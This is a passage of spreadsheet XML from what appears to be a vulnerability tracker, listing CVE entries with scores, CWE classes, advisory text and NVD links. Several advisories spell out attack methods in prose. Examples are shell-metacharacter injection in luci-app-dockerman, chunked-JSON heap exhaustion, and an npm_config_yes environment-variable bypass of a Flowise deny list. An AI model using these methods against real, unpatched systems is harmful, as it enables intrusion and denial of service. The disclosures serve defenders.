          <t>better-auth versions &gt;= 1.1.3 and &lt; 1.6.22 (and pre-release versions &gt;= 1.7.0-beta.0 and &lt; 1.7.0-beta.10) are vulnerable to account takeover via pre-account hijacking on magic-link and email-OTP sign-in when open email/password registration is enabled. An attacker registers an account with the victim's email address and an attacker-chosen password; the account remains unverified. When the legitimate owner later signs in via the magic-link or email-OTP passwordless flow, the account is marked verified without removing the pre-existing password or revoking existing sessions, so the attacker's password remains valid, granting persistent access to the victim's account. Fixed in 1.6.22 and 1.7.0-beta.10.</t>
        </is>
      </c>
      <c r="M1186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67327</t>
        </is>
      </c>
    </row>
    <row r="1187">
      <c r="A1187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67331</t>
        </is>
      </c>
      <c r="C1187" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1187" s="5" t="inlineStr"/>
      <c r="F1187" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1187" s="5" t="inlineStr"/>
      <c r="H1187" s="5" t="inlineStr"/>
      <c r="I1187" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J1187" s="5" t="inlineStr"/>
      <c r="K1187" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1187" s="5" t="inlineStr">
        <is>
          <t>better-auth SCIM versions from 1.5.0 before 1.7.0-beta.4 fail to bind non-organization SCIM providers to their creator by default, allowing authenticated users to manage other users' providers. Attackers can regenerate SCIM bearer tokens, invalidate legitimate tokens, and authenticate to SCIM API routes with the attacker-controlled token.</t>
        </is>
      </c>
      <c r="M1187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67331</t>
        </is>
      </c>
    </row>
    <row r="1188">
      <c r="A1188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67581</t>
        </is>
      </c>
      <c r="C1188" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1188" s="5" t="inlineStr"/>
      <c r="F1188" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1188" s="5" t="inlineStr"/>
      <c r="H1188" s="5" t="inlineStr">
        <is>
          <t>zenhive:machine_payments_protocol</t>
        </is>
      </c>
      <c r="I1188" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1188" s="5" t="inlineStr"/>
      <c r="K1188" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="L1188" s="5" t="inlineStr">
        <is>
          <t>Authentication Bypass by Capture-replay in ZenHive mpp allows an unauthenticated remote client to obtain paid resources by resubmitting one settled on-chain transfer.
MPP.Methods.EVM.verify/2 accepts a transaction-hash credential and matches a transfer purely on token, to and amount (ERC-20) or to and value (native). It binds the proof neither to the challenge being verified nor to any record of prior use, and the generic MPP.Plug dedup store keys on challenge.id, which is regenerated for every 402 response. On a static-price route, a single historical transfer matching the charge therefore satisfies an unbounded number of later charges, including transfers an attacker can read off a public block explorer.
This issue affects mpp: from 0.3.0 before 0.6.3.</t>
        </is>
      </c>
      <c r="M1188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67581</t>
        </is>
      </c>
    </row>
    <row r="1189">
      <c r="A1189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68494</t>
        </is>
      </c>
      <c r="C1189" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1189" s="5" t="inlineStr"/>
      <c r="F1189" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1189" s="5" t="inlineStr">
        <is>
          <t>java, spring</t>
        </is>
      </c>
      <c r="H1189" s="5" t="inlineStr"/>
      <c r="I1189" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1189" s="5" t="inlineStr"/>
      <c r="K1189" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1189" s="5" t="inlineStr">
        <is>
          <t>The fix released in jackson-core 2.18.6 and 2.21.1 for CVE-2026-18401 (GHSA-72hv-8253-57qq, number length constraint bypass in the non-blocking parser) is incomplete. This record covers the remaining bypass.
The earlier fix wired validateIntegerLength() into a new _setIntLength() helper and invoked it wherever the integer portion of a number is decided: a terminator byte arrives, a '.' or 'e'/'E' is seen, or input ends inside a fully buffered value. It was not invoked on the attacker-relevant path where the parser runs out of input while still inside the MINOR_NUMBER_INTEGER_DIGITS minor state and returns NOT_AVAILABLE to the caller.
As a result, an attacker who streams JSON to a non-blocking parser in many small chunks, without ever sending a terminator byte, keeps the parser inside MINOR_NUMBER_INTEGER_DIGITS indefinitely. _textBuffer.expandCurrentSegment() grows the accumulator on every chunk while validateIntegerLength() is never called. The accumulator is bounded only by maxStringLength (20 MiB by default) rather than by maxNumberLength (1000 by default), an amplification of roughly 20,000x over the documented limit. Because Java char values occupy two bytes, a single connection can be driven to approximately 40 MiB of heap before the validator finally fires when the value completes.
The equivalent fraction-path code is correct: _finishFloatFraction() calls _setFractLength() before its NOT_AVAILABLE return. The missing call affects the integer-digit paths in _startPositiveNumber(), _startNegativeNumber() and _finishNumberIntegralPart() in NonBlockingUtf8JsonParserBase.
Impact: reactive frameworks such as Spring WebFlux/Reactor, Quarkus, Helidon and Vert.x feed inbound HTTP or gRPC bytes to the async parser as they arrive, which is precisely the chunked-feed shape required. Operators who set StreamReadConstraints.maxNumberLength expecting it to cap memory per number value do not get that guarantee; memory accumulates per concurrent connection and attacker-controlled concurrency can exhaust the JVM heap. The synchronous parsers (UTF8StreamJsonParser, ReaderBasedJsonParser) and the async parser operating on complete input are not affected.
Exploitation requires only the ability to stream data to a parsing endpoint; no privileges or user interaction are needed.
This issue affects com.fasterxml.jackson.core:jackson-core from version 2.15.0 through 2.18.7, and from 2.19.0 through 2.21.3, and tools.jackson.core:jackson-core from 3.0.0 through 3.1.3. Versions prior to 2.15.0 are not affected, because StreamReadConstraints -- which defines the maxNumberLength setting -- was first introduced in jackson-core 2.15.0, so no such constraint exists to be bypassed in earlier releases. Note that GHSA-r7wm-3cxj-wff9 states the affected 2.x range without a lower bound. The 2.22.x and 3.2.x release lines are not affected: those branches were created after the fix commit landed on 2026-05-21 and therefore contain it from their initial releases (2.22.0, tagged 2026-06-03, and 3.2.0, tagged 2026-06-08).</t>
        </is>
      </c>
      <c r="M1189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68494</t>
        </is>
      </c>
    </row>
    <row r="1190">
      <c r="A1190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68899</t>
        </is>
      </c>
      <c r="C1190" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1190" s="5" t="inlineStr"/>
      <c r="F1190" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1190" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1190" s="5" t="inlineStr"/>
      <c r="I1190" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1190" s="5" t="inlineStr"/>
      <c r="K1190" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L1190" s="5" t="inlineStr">
        <is>
          <t>Wekan is open source kanban built with Meteor. Prior to 9.90, isFileValid() in models/fileValidation.js used the Unix file command for content-based MIME detection, but detectMimeFromFile() silently returned undefined when that binary was unavailable and the validation fell back to the attacker-controlled fileObj.type supplied through server/routes/attachmentApi.js. On deployments with WITH_API=true and no file binary, an authenticated board member could label HTML containing JavaScript as image/png, bypass the dangerous MIME check, and store active content under the Wekan origin for execution when another user opened it. Version 9.90 adds looksLikeDangerousMarkup() to inspect file bytes and force dangerous-content scanning when MIME detection is unavailable. This issue is fixed in version 9.90.</t>
        </is>
      </c>
      <c r="M1190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68899</t>
        </is>
      </c>
    </row>
    <row r="1191">
      <c r="A1191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69091</t>
        </is>
      </c>
      <c r="C1191" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1191" s="5" t="inlineStr"/>
      <c r="F1191" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1191" s="5" t="inlineStr"/>
      <c r="H1191" s="5" t="inlineStr"/>
      <c r="I1191" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1191" s="5" t="inlineStr"/>
      <c r="K1191" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1191" s="5" t="inlineStr">
        <is>
          <t>Admidio before 5.0.11 contains an authentication bypass vulnerability in the forum module when configured in login-only mode. The access control logic in modules/forum.php fails to validate the login-only configuration state, allowing unauthenticated attackers to read forum topics and posts by directly accessing the module with read-only parameters.</t>
        </is>
      </c>
      <c r="M1191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69091</t>
        </is>
      </c>
    </row>
    <row r="1192">
      <c r="A1192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69095</t>
        </is>
      </c>
      <c r="C1192" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1192" s="5" t="inlineStr"/>
      <c r="F1192" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1192" s="5" t="inlineStr"/>
      <c r="H1192" s="5" t="inlineStr"/>
      <c r="I1192" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1192" s="5" t="inlineStr"/>
      <c r="K1192" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1192" s="5" t="inlineStr">
        <is>
          <t>OpenWrt luci-app-bmx7 before commit 5890760a454dad2cb00389dba2cdc5e779e0ffdd contains a path traversal vulnerability in the bmx7-info CGI script that allows unauthenticated attackers to read files outside the configured runtimeDir. Attackers can supply directory traversal sequences in the query string to escape the intended directory and read sensitive files accessible to the CGI process.</t>
        </is>
      </c>
      <c r="M1192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69095</t>
        </is>
      </c>
    </row>
    <row r="1193">
      <c r="A1193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69096</t>
        </is>
      </c>
      <c r="C1193" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1193" s="5" t="inlineStr"/>
      <c r="F1193" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="G1193" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1193" s="5" t="inlineStr"/>
      <c r="I1193" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1193" s="5" t="inlineStr"/>
      <c r="K1193" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1193" s="5" t="inlineStr">
        <is>
          <t>OpenWrt luci-app-dockerman (LuCI master and openwrt-25.12 snapshots containing the ucode docker_rpc.uc RPC backend after the JS/ucode conversion) contains an OS command injection vulnerability. The package's read ACL grants broad ubus access to docker.* / docker.container.*, which exposes the docker.container.ttyd_start method even though it performs mutating operations. The run_ttyd handler builds a shell command from the request-controlled id, cmd, and uid fields and passes it to system() without quoting or argv-style execution in the rpcd root context. An authenticated attacker holding only the luci-app-dockerman read ACL can inject shell metacharacters (e.g., in id) to execute arbitrary commands as root via an HTTP POST to /ubus. openwrt-24.10 and openwrt-23.05 do not contain this backend and are not affected; no patched version was known as of the advisory.</t>
        </is>
      </c>
      <c r="M1193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69096</t>
        </is>
      </c>
    </row>
    <row r="1194">
      <c r="A1194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69220</t>
        </is>
      </c>
      <c r="C1194" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1194" s="5" t="inlineStr"/>
      <c r="F1194" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1194" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1194" s="5" t="inlineStr"/>
      <c r="I1194" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1194" s="5" t="inlineStr"/>
      <c r="K1194" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L1194" s="5" t="inlineStr">
        <is>
          <t>The RabbitMQ Java client library allows Java and JVM-based applications to connect to and interact with RabbitMQ nodes. Prior to 5.33.1, src/main/java/com/rabbitmq/client/impl/ValueReader.java permits ValueReader.readTable and ValueReader.readArray to call ValueReader.readFieldValue recursively for AMQP table type F and AMQP array type A values without a nesting-depth limit. A malicious AMQP server or network intermediary can send approximately 580 nested table levels in the pre-authentication connection.start frame, fitting within the default 131072-byte frame maximum, to trigger StackOverflowError. The error terminates the client input processing thread and causes denial of service. This issue is fixed in version 5.33.1.</t>
        </is>
      </c>
      <c r="M1194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69220</t>
        </is>
      </c>
    </row>
    <row r="1195">
      <c r="A1195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6924</t>
        </is>
      </c>
      <c r="C1195" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1195" s="5" t="inlineStr"/>
      <c r="F1195" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1195" s="5" t="inlineStr"/>
      <c r="H1195" s="5" t="inlineStr"/>
      <c r="I1195" s="5" t="inlineStr">
        <is>
          <t>2026-07-23</t>
        </is>
      </c>
      <c r="J1195" s="5" t="inlineStr"/>
      <c r="K1195" s="5" t="inlineStr">
        <is>
          <t>CWE-336</t>
        </is>
      </c>
      <c r="L1195" s="5" t="inlineStr">
        <is>
          <t>A bug in the entropy initialization for SiWx917 causes the DRBG to use a predictable seed. As such, all random numbers generated in the Matter code use the same stream of numbers. This vulnerability was discovered after the impacted repository was already deprecated.</t>
        </is>
      </c>
      <c r="M1195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6924</t>
        </is>
      </c>
    </row>
    <row r="1196">
      <c r="A1196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69249</t>
        </is>
      </c>
      <c r="C1196" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1196" s="5" t="inlineStr"/>
      <c r="F1196" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1196" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1196" s="5" t="inlineStr"/>
      <c r="I1196" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1196" s="5" t="inlineStr"/>
      <c r="K1196" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L1196" s="5" t="inlineStr">
        <is>
          <t>python-cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. In versions 42.0.0 through 48.0.0, when resolving invalid certificate chains that include duplicate copies of self-signed certificates, the processing recursively invokes the same candidate, leading to an exponential blowup. Although the limitation that the chain depth cannot exceed a specified maximum depth prevents unbounded recursion and guarantees termination, an attacker-controlled certificate chain can lead the processing to easily take more than 5s to reject in testing. This amplification could form the basis for a resource exhaustion denial of service attack. The core issue arises in the recursive nature of build_chain_inner, which does not de-duplicate against previously analyzed candidates. As the correctness of validation is not affected, the integrity of a system cannot be compromised through this vector, only its availability. This issue is fixed in 49.0.0.</t>
        </is>
      </c>
      <c r="M1196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69249</t>
        </is>
      </c>
    </row>
    <row r="1197">
      <c r="A1197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69263</t>
        </is>
      </c>
      <c r="C1197" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1197" s="5" t="inlineStr"/>
      <c r="F1197" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1197" s="5" t="inlineStr"/>
      <c r="H1197" s="5" t="inlineStr"/>
      <c r="I1197" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1197" s="5" t="inlineStr"/>
      <c r="K1197" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L1197" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, the mitigation for CVE-2025-8943 blocked -y and --yes flags on npx, but packages/components/nodes/tools/MCP/core.ts denied only PATH, LD_LIBRARY_PATH, DYLD_LIBRARY_PATH, and NODE_OPTIONS by exact environment-variable name. Because npm reads configuration from npm_config_* variables, setting npm_config_yes=true reproduced --yes behavior without using a blocked flag, causing npx to auto-install and execute the named package when a Custom MCP server launched. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M1197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69263</t>
        </is>
      </c>
    </row>
    <row r="1198">
      <c r="A1198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70453</t>
        </is>
      </c>
      <c r="C1198" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1198" s="5" t="inlineStr"/>
      <c r="F1198" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1198" s="5" t="inlineStr"/>
      <c r="H1198" s="5" t="inlineStr"/>
      <c r="I1198" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1198" s="5" t="inlineStr"/>
      <c r="K1198" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1198" s="5" t="inlineStr">
        <is>
          <t>rsync before 3.5.0 contains an algorithmic complexity vulnerability in the hash_search() function that allows a remote attacker to cause a denial of service by delivering a carefully constructed file list. A sender can exploit the quadratic-time worst-case behavior in hash lookups to exhaust receiver CPU resources with a modest number of crafted entries, causing a sustained denial of service.</t>
        </is>
      </c>
      <c r="M1198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70453</t>
        </is>
      </c>
    </row>
    <row r="1199">
      <c r="A1199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70464</t>
        </is>
      </c>
      <c r="C1199" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1199" s="5" t="inlineStr"/>
      <c r="F1199" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1199" s="5" t="inlineStr"/>
      <c r="H1199" s="5" t="inlineStr"/>
      <c r="I1199" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1199" s="5" t="inlineStr"/>
      <c r="K1199" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1199" s="5" t="inlineStr">
        <is>
          <t>rsync daemon 2.0.0 before 3.5.0 contains a denial of service vulnerability that allows unauthenticated remote attackers to exhaust daemon connection slots by stalling the handshake process before or after module selection without triggering the I/O timeout. Attackers can open many simultaneous connections and trickle data at the minimum rate to avoid timeout, or stall entirely before module selection where no timeout applies, consuming all available connection slots and denying service to legitimate clients.</t>
        </is>
      </c>
      <c r="M1199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70464</t>
        </is>
      </c>
    </row>
    <row r="1200">
      <c r="A1200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70492</t>
        </is>
      </c>
      <c r="C1200" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1200" s="5" t="inlineStr"/>
      <c r="F1200" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1200" s="5" t="inlineStr"/>
      <c r="H1200" s="5" t="inlineStr"/>
      <c r="I1200" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1200" s="5" t="inlineStr"/>
      <c r="K1200" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1200" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.10.0 until 0.11.0, src/lib/components/chat/Messages/Markdown/KatexRenderer.svelte could store and render a chat message whose math block makes KaTeX fail with a stack overflow instead of a parse error. The catch branch fell back to inserting the original math source into the page as HTML through {@html} rather than as text, so script in the message runs in the browser of whoever views it, including shared chats and channels. The viewer's session token in localStorage can be stolen, and an administrator viewer can have their account taken over. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M1200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70492</t>
        </is>
      </c>
    </row>
    <row r="1201">
      <c r="A1201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70619</t>
        </is>
      </c>
      <c r="C1201" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1201" s="5" t="inlineStr"/>
      <c r="F1201" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1201" s="5" t="inlineStr"/>
      <c r="H1201" s="5" t="inlineStr"/>
      <c r="I1201" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1201" s="5" t="inlineStr"/>
      <c r="K1201" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1201" s="5" t="inlineStr">
        <is>
          <t>Odysseus before commit bf325f6 contains a missing authorization vulnerability that allows authenticated non-admin users to manage server-wide embedding backend configuration by invoking endpoint management routes that verify session authentication but omit the admin authorization guard. Attackers can supply an attacker-controlled URL to overwrite the embedding backend persisted in the endpoint configuration file and process environment, causing all subsequent embedding operations including chat messages, RAG queries, memory entries, and vault text to be transmitted in plaintext to the attacker-controlled destination, or delete the endpoint configuration to deny embedding service to all users.</t>
        </is>
      </c>
      <c r="M1201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70619</t>
        </is>
      </c>
    </row>
    <row r="1202">
      <c r="A1202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71190</t>
        </is>
      </c>
      <c r="C1202" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1202" s="5" t="inlineStr"/>
      <c r="F1202" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1202" s="5" t="inlineStr"/>
      <c r="H1202" s="5" t="inlineStr"/>
      <c r="I1202" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1202" s="5" t="inlineStr"/>
      <c r="K1202" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L1202" s="5" t="inlineStr">
        <is>
          <t>In OpenStack Swift through 2.38.0, the proxy server Accept header parser contains a regular expression vulnerable to catastrophic backtracking (ReDoS). The "qdtext" pattern (?:[^"]|\\.)* allows an unauthenticated remote attacker to send a crafted Accept header that causes exponential CPU consumption in the proxy worker. A payload of 32 backslash-character pairs exceeds 30 seconds of CPU time. No authentication is required. Repeated requests can exhaust all proxy worker threads, resulting in a complete denial of service.</t>
        </is>
      </c>
      <c r="M1202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71190</t>
        </is>
      </c>
    </row>
    <row r="1203">
      <c r="A1203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71404</t>
        </is>
      </c>
      <c r="C1203" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1203" s="5" t="inlineStr"/>
      <c r="F1203" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1203" s="5" t="inlineStr"/>
      <c r="H1203" s="5" t="inlineStr"/>
      <c r="I1203" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1203" s="5" t="inlineStr"/>
      <c r="K1203" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1203" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Rancher Manager. The GlobalRole controller derived the target ClusterRole name from the user-settable `authz.management.cattle.io/cr-name` annotation and overwrote that object's rules without verifying ownership. A user with delegated GlobalRole create or update permission could point the annotation at any existing ClusterRole, such as `cluster-admin`, and revoke the permissions of every principal bound to it. The change persists after the malicious GlobalRole is deleted.
This issue affects Rancher: before 2.15.1.</t>
        </is>
      </c>
      <c r="M1203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71404</t>
        </is>
      </c>
    </row>
    <row r="1204">
      <c r="A1204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71491</t>
        </is>
      </c>
      <c r="C1204" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1204" s="5" t="inlineStr"/>
      <c r="F1204" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1204" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1204" s="5" t="inlineStr"/>
      <c r="I1204" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1204" s="5" t="inlineStr"/>
      <c r="K1204" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="L1204" s="5" t="inlineStr">
        <is>
          <t>sqlparse is a non-validating SQL parser module for Python. Prior to 0.6.0, group_comments in sqlparse/engine/grouping.py repeatedly rescans comment-only statements before the MAX_GROUPING_TOKENS guard, causing quadratic CPU consumption through sqlparse.parse() and sqlparse.format(sql, strip_comments=True). This issue is fixed in version 0.6.0.</t>
        </is>
      </c>
